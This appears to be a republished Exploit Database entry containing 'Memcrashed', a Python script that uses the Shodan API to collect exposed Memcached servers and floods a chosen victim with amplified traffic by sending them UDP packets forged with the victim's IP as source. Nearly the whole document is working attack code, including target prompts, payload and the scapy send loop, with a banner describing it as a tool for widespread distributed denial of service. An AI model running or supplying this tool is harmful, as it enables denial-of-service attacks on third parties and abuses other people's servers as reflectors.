Memcached 1.5.5 – ‘Memcrashed ‘ Insufficient Control of Network Message Volume Denial of Service With Shodan API

Exploit Database
122 阅读

作者： 649

日期： 2018-03-08
类别：
- dos
平台：
- linux
来源：https://www.exploit-db.com/exploits/44265/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

#-- coding: utf8 --

#!/usr/bin/python

# Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44265.zip

import sys, os, time, shodan

from pathlib import Path

from scapy.all import *

from contextlib import contextmanager

starttime=time.time()

@contextmanager

def suppress_stdout():

with open(os.devnull, "w") as devnull:

old_stdout = sys.stdout

sys.stdout = devnull

try:

yield

finally:

sys.stdout = old_stdout

class color:

HEADER = '\033[0m'

keys = Path("./api.txt")

logo = color.HEADER + '''

███╗ ███╗███████╗███╗ ███╗ ██████╗██████╗█████╗ ███████╗██╗██╗███████╗██████╗

████╗ ████║██╔════╝████╗ ████║██╔════╝██╔══██╗██╔══██╗██╔════╝██║██║██╔════╝██╔══██╗

██╔████╔██║█████╗██╔████╔██║██║ ██████╔╝███████║███████╗███████║█████╗██║██║

██║╚██╔╝██║██╔══╝██║╚██╔╝██║██║ ██╔══██╗██╔══██║╚════██║██╔══██║██╔══╝██║██║

██║ ╚═╝ ██║███████╗██║ ╚═╝ ██║╚██████╗██║██║██║██║███████║██║██║███████╗██████╔╝

╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝╚═╝╚═╝╚═╝╚══════╝╚═╝╚═╝╚══════╝╚═════╝

Author: @037

Version: 3.1

####################################### DISCLAIMER ########################################

| Memcrashed is a tool that allows you to use Shodan.io to obtain hundreds of vulnerable|

| memcached servers. It then allows you to use the same servers to launch widespread|

| distributed denial of service attacks by forging UDP packets sourced to your victim.|

| Default payload includes the memcached "stats" command, 10 bytes to send, but the reply |

| is between 1,500 bytes up to hundreds of kilobytes. Please use this tool responsibly. |

| I am NOT responsible for any damages caused or any crimes committed by using this tool. |

###########################################################################################

'''

print(logo)

if keys.is_file():

with open('api.txt', 'r') as file:

SHODAN_API_KEY=file.readlines()

else:

file = open('api.txt', 'w')

SHODAN_API_KEY = input('[*] Please enter a valid Shodan.io API Key: ')

file.write(SHODAN_API_KEY)

print('[~] File written: ./api.txt')

file.close()

while True:

api = shodan.Shodan(SHODAN_API_KEY)

print('')

try:

myresults = Path("./bots.txt")

query = input("[*] Use Shodan API to search for affected Memcached servers? <Y/n>: ").lower()

if query.startswith('y'):

print('')

print('[~] Checking Shodan.io API Key: %s' % SHODAN_API_KEY)

results = api.search('product:"Memcached" port:11211')

print('[✓] API Key Authentication: SUCCESS')

print('[~] Number of bots: %s' % results['total'])

print('')

saveresult = input("[*] Save results for later usage? <Y/n>: ").lower()

if saveresult.startswith('y'):

file2 = open('bots.txt', 'a')

for result in results['matches']:

file2.write(result['ip_str'] + "\n")

print('[~] File written: ./bots.txt')

print('')

file2.close()

saveme = input('[*] Would you like to use locally stored Shodan data? <Y/n>: ').lower()

if myresults.is_file():

if saveme.startswith('y'):

ip_arrayn = []

with open('bots.txt') as my_file:

for line in my_file:

ip_arrayn.append(line)

ip_array = [s.rstrip() for s in ip_arrayn]

else:

print('')

print('[✘] Error: No bots stored locally, bots.txt file not found!')

print('')

if saveme.startswith('y') or query.startswith('y'):

print('')

target = input("[▸] Enter target IP address: ")

power = int(input("[▸] Enter preferred power (Default 1): ") or "1")

data = input("[▸] Enter payload contained inside packet: ") or "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"

print('')

if query.startswith('y'):

iplist = input('[*] Would you like to display all the bots from Shodan? <Y/n>: ').lower()

if iplist.startswith('y'):

print('')

counter= int(0)

for result in results['matches']:

host = api.host('%s' % result['ip_str'])

counter=counter+1

print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, result['ip_str'], host.get('os', 'n/a'), host.get('org', 'n/a')))

time.sleep(2.0 - ((time.time() - starttime) % 2.0))

if saveme.startswith('y'):

iplistlocal = input('[*] Would you like to display all the bots stored locally? <Y/n>: ').lower()

if iplistlocal.startswith('y'):

print('')

counter= int(0)

for x in ip_array:

host = api.host('%s' % x)

counter=counter+1

print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, x, host.get('os', 'n/a'), host.get('org', 'n/a')))

time.sleep(2.0 - ((time.time() - starttime) % 2.0))

print('')

engage = input('[*] Ready to engage target %s? <Y/n>: ' % target).lower()

if engage.startswith('y'):

if saveme.startswith('y'):

for i in ip_array:

if power>1:

print('[+] Sending %d forged UDP packets to: %s' % (power, i))

with suppress_stdout():

send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power)

elif power==1:

print('[+] Sending 1 forged UDP packet to: %s' % i)

with suppress_stdout():

send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power)

else:

for result in results['matches']:

if power>1:

print('[+] Sending %d forged UDP packets to: %s' % (power, result['ip_str']))

with suppress_stdout():

send(IP(src=target, dst='%s' % result['ip_str']) / UDP(dport=11211)/Raw(load=data), count=power)

elif power==1:

print('[+] Sending 1 forged UDP packet to: %s' % result['ip_str'])

with suppress_stdout():

send(IP(src=target, dst='%s' % result['ip_str']) / UDP(dport=11211)/Raw(load=data), count=power)